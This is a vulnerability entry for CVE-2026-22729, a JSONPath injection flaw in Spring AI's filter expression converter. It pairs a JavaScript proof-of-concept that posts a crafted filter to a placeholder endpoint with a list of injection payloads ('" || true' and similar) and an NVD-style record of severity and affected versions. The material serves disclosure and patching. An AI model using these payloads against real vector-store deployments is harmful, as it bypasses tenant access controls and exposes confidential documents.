CVE-2026-22729

// CVE-2026-22729 JSONPath Injection PoC // Target: Spring AI AbstractFilterExpressionConverter // Malicious filter expression to bypass metadata-based access control const maliciousFilter = { // Inject JSONPath logic using special characters filter: '" || true || "', // Alternative injection using && operator // filter: '" && true && "', // Access specific document metadata // filter: '"owner" == "attacker" || "sensitive" == true' }; // Example exploitation through vector store query async function exploitVectorStore() { const springAIEndpoint = 'https://target-api.ai/search'; // Normal query (intended behavior) const normalQuery = { query: 'confidential document', filter: 'owner == "current_user"' }; // Injected query (exploits CVE-2026-22729) const injectedQuery = { query: 'confidential document', filter: 'owner == "victim" || true || "' }; const response = await fetch(springAIEndpoint, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <legitimate_token>' }, body: JSON.stringify(injectedQuery) }); // Response may contain unauthorized documents const results = await response.json(); return results; } // JSONPath injection payload examples const payloads = [ '" || true', '" || 1==1', '" && true && "', '"][*] || true', '"].* || true || "', '@.owner == "admin" || true' ];

{"cve": {"id": "CVE-2026-22729", "sourceIdentifier": "[email protected]", "published": "2026-03-18T08:16:31.000", "lastModified": "2026-04-01T16:53:35.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A JSONPath injection vulnerability in Spring AI's AbstractFilterExpressionConverter allows authenticated users to bypass metadata-based access controls through crafted filter expressions. User-controlled input passed to FilterExpressionBuilder is concatenated into JSONPath queries without proper escaping, enabling attackers to inject arbitrary JSONPath logic and access unauthorized documents.\n\nThis vulnerability affects applications using vector stores that extend AbstractFilterExpressionConverter for multi-tenant isolation, role-based access control, or document filtering based on metadata.\n\nThe vulnerability occurs when user-supplied values in filter expressions are not escaped before being inserted into JSONPath queries. Special characters like \", ||, and && are passed through unescaped, allowing injection of arbitrary JSONPath logic that can alter the intended query semantics."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de JSONPath en el AbstractFilterExpressionConverter de Spring AI permite a usuarios autenticados eludir los controles de acceso basados en metadatos mediante expresiones de filtro manipuladas. La entrada controlada por el usuario pasada a FilterExpressionBuilder se concatena en consultas JSONPath sin el escape adecuado, lo que permite a los atacantes inyectar lógica JSONPath arbitraria y acceder a documentos no autorizados.\n\nEsta vulnerabilidad afecta a las aplicaciones que utilizan almacenes vectoriales que extienden AbstractFilterExpressionConverter para aislamiento multi-inquilino, control de acceso basado en roles o filtrado de documentos basado en metadatos.\n\nLa vulnerabilidad ocurre cuando los valores proporcionados por el usuario en las expresiones de filtro no se escapan antes de ser insertados en las consultas JSONPath. Caracteres especiales como '\"', '||' y '&amp;&amp;' se pasan sin escapar, lo que permite la inyección de lógica JSONPath arbitraria que puede alterar la semántica de la consulta prevista."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-917"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.0.4", "matchCriteriaId": "F510851F-2162-4380-97A0-75456BC7875A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.0", "versionEndExcluding": "1.1.3", "matchCriteriaId": "34C3CF7E-1A85-4EFE-8CC0-03E85527B2D5"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22729", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}